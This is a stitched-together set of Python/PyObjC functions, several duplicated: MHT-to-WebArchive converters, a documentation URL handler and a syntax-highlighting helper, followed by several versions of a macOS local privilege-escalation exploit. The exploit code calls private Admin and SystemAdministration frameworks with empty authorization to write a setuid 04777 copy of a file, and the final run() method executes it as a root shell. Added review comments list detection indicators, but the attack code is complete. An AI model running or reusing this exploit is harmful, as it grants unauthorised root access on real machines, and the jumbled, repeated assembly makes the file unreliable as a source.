def asWebArchive(self):
    """
    Build a WebArchive from the parts of this MHT archive.

    The entry stored under ``self.root`` becomes the main resource and
    every other entry in ``self.parts`` becomes a subresource. No subframe
    archives are attached.
    """

    def make_resource(url, mime_type, payload, length):
        # Text encoding name and frame name are both left unset (None).
        return WebResource.alloc().initWithData_URL_MIMEType_textEncodingName_frameName_(
            NSData.dataWithBytes_length_(payload, length),
            NSURL.URLWithString_(self.fixupURL(url)),
            NSString.stringWithString_(mime_type),
            None,
            None,
        )

    root_mime, root_body = self.parts[self.root]
    # The backslash-to-slash rewrite runs over the whole root payload, not
    # only over URL attributes; it is byte-for-byte, so the length passed
    # to NSData still matches.
    # NOTE(review): the parts come from the parsed archive file; whether
    # they are validated anywhere is not visible here -- treat them as
    # untrusted content.
    main_resource = make_resource(
        self.root, root_mime, root_body.replace(b"\\", b"/"), len(root_body))

    subresources = []
    for url in self.parts:
        if url != self.root:
            mime_type, body = self.parts[url]
            subresources.append(make_resource(url, mime_type, body, len(body)))

    return WebArchive.alloc().initWithMainResource_subresources_subframeArchives_(
        main_resource, subresources, None)
def asWebArchive(self):
    """
    Convert the MHT archive to a webarchive.

    The part keyed by ``self.root`` is wrapped as the page resource; all
    remaining parts are wrapped as subresources, in iteration order of
    ``self.parts``.
    """
    parts = self.parts
    root_url = self.root

    page_mime, page_bytes = parts[root_url]
    # Backslashes in the root document are rewritten to forward slashes
    # before it is handed to WebKit. One byte is swapped for one byte, so
    # len(page_bytes) is still the right length.
    normalised = page_bytes.replace(b"\\", b"/")
    page_resource = WebResource.alloc(
    ).initWithData_URL_MIMEType_textEncodingName_frameName_(
        NSData.dataWithBytes_length_(normalised, len(page_bytes)),
        NSURL.URLWithString_(self.fixupURL(root_url)),
        NSString.stringWithString_(page_mime),
        None,
        None,
    )

    other_urls = [url for url in parts if url != root_url]
    sub_resources = []
    for url in other_urls:
        mime, blob = parts[url]
        wrapped = WebResource.alloc(
        ).initWithData_URL_MIMEType_textEncodingName_frameName_(
            NSData.dataWithBytes_length_(blob, len(blob)),
            NSURL.URLWithString_(self.fixupURL(url)),
            NSString.stringWithString_(mime),
            None,
            None,
        )
        sub_resources.append(wrapped)

    # Third argument: no subframe archives.
    return WebArchive.alloc(
    ).initWithMainResource_subresources_subframeArchives_(
        page_resource, sub_resources, None)
def startLoading(self):
    """
    Answer the pending request with HTML documentation for a module.

    The module name is derived from the request URL path; the HTML comes
    from ``gethtmldoc``. Any exception while producing it is reported to
    the client as NSURLErrorResourceUnavailable.
    """
    client = self.client()
    request = self.request()

    # "/pkg/mod.html" -> "pkg.mod". Note that replace() drops every
    # ".html" occurrence in the path, not only a trailing suffix.
    path = request.URL().standardizedURL().path()
    dotted = path.replace("/", ".")
    dotted = dotted.lstrip(".")
    modpath = dotted.replace(".html", "")
    if not PY3K:
        modpath = modpath.encode("utf-8")

    # NOTE(review): modpath is taken straight from the request URL.
    # gethtmldoc is defined elsewhere; confirm what it does with an
    # arbitrary dotted name (for example whether it imports the module).
    try:
        data = gethtmldoc(modpath)
        if PY3K:
            data = data.encode("utf-8")
    except Exception:
        failure = NSError.errorWithDomain_code_userInfo_(
            NSURLErrorDomain, NSURLErrorResourceUnavailable, None)
        client.URLProtocol_didFailWithError_(self, failure)
        return

    response = NSURLResponse.alloc(
    ).initWithURL_MIMEType_expectedContentLength_textEncodingName_(  # noqa: B950
        request.URL(), "text/html", len(data), "utf-8")
    # The response is marked as not cacheable.
    client.URLProtocol_didReceiveResponse_cacheStoragePolicy_(
        self, response, NSURLCacheStorageNotAllowed)
    body = NSData.dataWithBytes_length_(data, len(data))
    client.URLProtocol_didLoadData_(self, body)
    client.URLProtocolDidFinishLoading_(self)
def update(self, s):
    """
    Turn *s* into an NSAttributedString and pass it to ``self.sel``.

    *s* may be an NSAttributedString (used as is), an NSData holding RTF
    (parsed), or anything else, which is treated as source text and
    highlighted with pygments. The resulting attributed string is
    returned; ``self.sel`` is called with it when it is not None.
    """
    # Classify the input; anything that is not one of the two Cocoa types
    # is handled as a plain string.
    if isinstance(s, NSAttributedString):
        kind = 'NSAttributedString'
    elif isinstance(s, NSData):
        kind = 'rtf'
    else:
        kind = 'string'

    if kind == 'NSAttributedString':
        if self.sel is not None:
            self.sel(s)
        return s

    if kind == 'rtf':
        parsed = NSAttributedString.alloc().initWithRTF_documentAttributes_(
            s, None)
        # Element 0 of the result is the attributed string.
        attributed = parsed[0]
        if self.sel is not None:
            self.sel(parsed[0])
        return attributed

    if kind == 'string':
        # self.lexer is True means "guess"; otherwise it is used as the
        # lexer class directly.
        try:
            if self.lexer is True:
                lexer_cls = guess_lexer(s).__class__
            else:
                lexer_cls = self.lexer
        except pygments.util.ClassNotFound:
            lexer_cls = None

        if lexer_cls is None:
            # No lexer available: fall back to the unformatted text.
            plain = NSAttributedString.alloc().initWithString_(s)
            if self.sel is not None:
                self.sel(plain)
            return plain

        lexer_obj = lexer_cls()
        formatter = RtfFormatter(
            style=self.style,
            fontface=self.font,
            fontsize=self.fontsize * 2,  # the formatter wants half points
        )
        rtf_bytes = highlight(s, lexer_obj, formatter).encode('utf-8')
        rtf_data = NSData.dataWithBytes_length_(rtf_bytes, len(rtf_bytes))
        # Re-enter with the RTF data; that call performs the parsing and
        # the self.sel notification.
        return self.update(rtf_data)

    raise ValueError('unsupported format; %s' % kind)
def verify(cls, args):
    """
    Proof-of-concept check: ask a system administration helper to create
    a file with a setuid mode from the contents of a local file.

    Reads ``args['options']['target']`` (source file) and
    ``args['options']['dest_binary']`` (destination path), requests the
    file creation through private framework classes, then sets
    ``args['success']`` and ``args['poc_ret']['dest_binary']`` and returns
    ``args``. Raises Exception when the source file does not exist.

    Review notes (defensive):
    - The file-creation request is sent after authenticating with either
      a freshly created SFAuthorization object or with None, i.e. no
      credentials are supplied by the caller in this code.
    - ``success`` is set unconditionally; nothing here checks that the
      destination file was actually created.
    - Indicators worth monitoring on hosts: new files carrying the setuid
      bit outside of software installs, and non-system processes loading
      the Admin / SystemAdministration frameworks.
    """
    source_binary = args['options']['target']
    # realpath() canonicalises the destination (symlinks, relative parts).
    dest_binary = os.path.realpath(args['options']['dest_binary'])

    if not os.path.exists(source_binary):
        raise Exception("file does not exist!")

    pool = NSAutoreleasePool.alloc().init()

    attr = NSMutableDictionary.alloc().init()
    # 04777 is a Python 2 octal literal: setuid bit plus rwx for owner,
    # group and others.
    attr.setValue_forKey_(04777, NSFilePosixPermissions)

    data = NSData.alloc().initWithContentsOfFile_(source_binary)

    print "[*] will write file", dest_binary

    # Two code paths, selected by use_old_api() (defined elsewhere).
    if cls.use_old_api():
        adm_lib = cls.load_lib("/Admin.framework/Admin")
        Authenticator = objc.lookUpClass("Authenticator")
        ToolLiaison = objc.lookUpClass("ToolLiaison")
        SFAuthorization = objc.lookUpClass("SFAuthorization")

        authent = Authenticator.sharedAuthenticator()
        authref = SFAuthorization.authorization()

        # authref with value nil is not accepted on OS X <= 10.8
        authent.authenticateUsingAuthorizationSync_(authref)
        st = ToolLiaison.sharedToolLiaison()
        tool = st.tool()
        tool.createFileWithContents_path_attributes_(
            data, dest_binary, attr)
    else:
        adm_lib = cls.load_lib(
            "/SystemAdministration.framework/SystemAdministration")
        WriteConfigClient = objc.lookUpClass("WriteConfigClient")
        client = WriteConfigClient.sharedClient()
        # None is passed as the authorization on this path.
        client.authenticateUsingAuthorizationSync_(None)
        tool = client.remoteProxy()

        tool.createFileWithContents_path_attributes_(
            data, dest_binary, attr, 0)

    print "[+] Done!"
    del pool
    # Reported as success without verifying the outcome of the request.
    args['success'] = True
    args['poc_ret']['dest_binary'] = dest_binary
    return args
def verify(cls, args):
    """
    Proof-of-concept check that requests creation of a setuid file through
    a system administration helper.

    Inputs are ``args['options']['target']`` (file whose bytes are copied)
    and ``args['options']['dest_binary']`` (where the copy is requested).
    On return ``args['success']`` is True and
    ``args['poc_ret']['dest_binary']`` holds the resolved destination.
    Raises Exception when the source file is missing.

    Review notes (defensive):
    - No caller credentials appear in this code: one path authenticates
      with a new SFAuthorization object, the other with None.
    - The result flag is set without checking that the file exists.
    - For detection, watch for unexpected setuid files and for processes
      outside the system's own tools loading these private frameworks.
    """
    source_binary = args['options']['target']
    dest_binary = os.path.realpath(args['options']['dest_binary'])

    if not os.path.exists(source_binary):
        raise Exception("file does not exist!")

    pool = NSAutoreleasePool.alloc().init()

    # File attributes for the request: mode 04777 (Python 2 octal), i.e.
    # setuid plus read/write/execute for everyone.
    attr = NSMutableDictionary.alloc().init()
    attr.setValue_forKey_(04777, NSFilePosixPermissions)

    data = NSData.alloc().initWithContentsOfFile_(source_binary)

    print "[*] will write file", dest_binary

    if cls.use_old_api():
        # Path taken when use_old_api() (defined elsewhere) is true.
        adm_lib = cls.load_lib("/Admin.framework/Admin")
        Authenticator = objc.lookUpClass("Authenticator")
        ToolLiaison = objc.lookUpClass("ToolLiaison")
        SFAuthorization = objc.lookUpClass("SFAuthorization")

        authent = Authenticator.sharedAuthenticator()
        authref = SFAuthorization.authorization()

        # authref with value nil is not accepted on OS X <= 10.8
        authent.authenticateUsingAuthorizationSync_(authref)
        st = ToolLiaison.sharedToolLiaison()
        tool = st.tool()
        tool.createFileWithContents_path_attributes_(data, dest_binary, attr)
    else:
        adm_lib = cls.load_lib("/SystemAdministration.framework/SystemAdministration")
        WriteConfigClient = objc.lookUpClass("WriteConfigClient")
        client = WriteConfigClient.sharedClient()
        # Authorization argument is None here.
        client.authenticateUsingAuthorizationSync_(None)
        tool = client.remoteProxy()

        tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0)

    print "[+] Done!"
    del pool
    # Success is recorded unconditionally.
    args['success'] = True
    args['poc_ret']['dest_binary'] = dest_binary
    return args
def startLoading(self):
    """
    Load the documentation page addressed by the current request.

    The URL path is mapped to a dotted module path, ``gethtmldoc`` renders
    it, and the result is delivered to the protocol client as UTF-8
    "text/html". If rendering raises, the client receives an
    NSURLErrorResourceUnavailable error instead.
    """
    client = self.client()
    request = self.request()

    # Slashes become dots, leading dots are stripped, and every ".html"
    # occurrence (not just a trailing one) is removed.
    url_path = request.URL().standardizedURL().path()
    modpath = url_path.replace("/", ".").lstrip(".").replace(".html", "")
    if not PY3K:
        modpath = modpath.encode("utf-8")

    # NOTE(review): the module path is controlled by whoever supplies the
    # URL; what gethtmldoc (defined elsewhere) does with an arbitrary name
    # should be confirmed.
    try:
        html = gethtmldoc(modpath)
        data = html.encode("utf-8") if PY3K else html
    except Exception:
        unavailable = NSError.errorWithDomain_code_userInfo_(
            NSURLErrorDomain,
            NSURLErrorResourceUnavailable,
            None,
        )
        client.URLProtocol_didFailWithError_(self, unavailable)
    else:
        size = len(data)
        response = NSURLResponse.alloc().initWithURL_MIMEType_expectedContentLength_textEncodingName_(
            request.URL(),
            "text/html",
            size,
            "utf-8",
        )
        # Caching of the response is disallowed.
        client.URLProtocol_didReceiveResponse_cacheStoragePolicy_(
            self,
            response,
            NSURLCacheStorageNotAllowed,
        )
        client.URLProtocol_didLoadData_(
            self,
            NSData.dataWithBytes_length_(data, len(data)),
        )
        client.URLProtocolDidFinishLoading_(self)
# Command-line form of the proof of concept: expects exactly two
# arguments, a source file and a destination path (Python 2 syntax).
if len(args) != 3:
    print "usage: exploit.py source_binary dest_binary_as_root"
    sys.exit(-1)

source_binary = args[1]
# realpath() canonicalises the destination path.
dest_binary = os.path.realpath(args[2])

if not os.path.exists(source_binary):
    raise Exception("file does not exist!")

pool = NSAutoreleasePool.alloc().init()

attr = NSMutableDictionary.alloc().init()
# 04777: setuid bit plus rwx for owner, group and others.
attr.setValue_forKey_(04777, NSFilePosixPermissions)

data = NSData.alloc().initWithContentsOfFile_(source_binary)

print "will write file", dest_binary

if use_old_api():
    adm_lib = load_lib("/Admin.framework/Admin")
    Authenticator = objc.lookUpClass("Authenticator")
    ToolLiaison = objc.lookUpClass("ToolLiaison")
    SFAuthorization = objc.lookUpClass("SFAuthorization")

    authent = Authenticator.sharedAuthenticator()
    authref = SFAuthorization.authorization()

    # authref with value nil is not accepted on OS X <= 10.8
    authent.authenticateUsingAuthorizationSync_(authref)
    st = ToolLiaison.sharedToolLiaison()
    # NOTE(review): the listing is cut off here; the rest of this branch
    # and any else branch are not shown.
def run(self):
    """
    Module entry point: request creation of a setuid copy of a local file
    through a system administration helper, then execute the copy.

    Reads the ``src_file`` and ``des_file`` options, refuses to continue
    when either is empty, when the source is missing, or when the
    destination already exists. OSError is caught at the end; anything
    other than ENOENT is re-raised after a message.

    Review notes (defensive):
    - The authorization passed on the newer path is None; the older path
      uses a freshly created SFAuthorization object.
    - The wait loop has no timeout and polls once per second.
    - For detection, the visible behaviours are: loading the Admin or
      SystemAdministration framework from a script, a new file with the
      setuid bit appearing, and that file being executed right after.
    """
    try:
        # Index 1 of each option entry is read as the configured value
        # (the layout of self.options is defined elsewhere).
        source_binary = self.options.get("src_file")[1]
        dest_binary = self.options.get("des_file")[1]
        if source_binary == None \
                or source_binary == "" \
                or dest_binary == None \
                or dest_binary == "":
            self.print_error(
                "It's mandatory to specify a source file and a destination file!!"
            )
            return

        if not os.path.exists(source_binary):
            self.print_error("File does not exist!")
            return

        # Existing destinations are never overwritten.
        if os.path.exists(dest_binary):
            self.print_error(
                "Destination file already exists. Use another name or remove/rename the original file!"
            )
            return

        pool = NSAutoreleasePool.alloc().init()

        attr = NSMutableDictionary.alloc().init()
        # 0o04777: setuid bit plus rwx for owner, group and others.
        attr.setValue_forKey_(0o04777, NSFilePosixPermissions)

        data = NSData.alloc().initWithContentsOfFile_(source_binary)

        self.print_info("will write file " + dest_binary)

        # Two code paths, selected by use_old_api() (defined elsewhere).
        if self.use_old_api():
            adm_lib = self.load_lib("/Admin.framework/Admin")
            Authenticator = objc.lookUpClass("Authenticator")
            ToolLiaison = objc.lookUpClass("ToolLiaison")
            SFAuthorization = objc.lookUpClass("SFAuthorization")

            authent = Authenticator.sharedAuthenticator()
            authref = SFAuthorization.authorization()

            # authref with value nil is not accepted on OS X <= 10.8
            authent.authenticateUsingAuthorizationSync_(authref)
            st = ToolLiaison.sharedToolLiaison()
            tool = st.tool()
            tool.createFileWithContents_path_attributes_(
                data, dest_binary, attr)
        else:
            adm_lib = self.load_lib(
                "/SystemAdministration.framework/SystemAdministration")
            WriteConfigClient = objc.lookUpClass("WriteConfigClient")
            client = WriteConfigClient.sharedClient()
            # None is passed as the authorization on this path.
            client.authenticateUsingAuthorizationSync_(None)
            tool = client.remoteProxy()

            tool.createFileWithContents_path_attributes_(
                data, dest_binary, attr, 0)

        self.print_ok("Done!")
        del pool
        # Poll until the destination shows up; there is no upper bound on
        # the wait.
        while not os.path.exists(dest_binary):
            self.print_info("Waiting file creation...")
            time.sleep(1)
        self.print_ok("Returning root whell at: " + dest_binary)
        # Runs the file that was just created.
        subprocess.call(dest_binary)
    except OSError as e:
        if e.errno == os.errno.ENOENT:
            print("Sorry, iSelect binary - Not found!")
        else:
            print("Error executing exploit")
        raise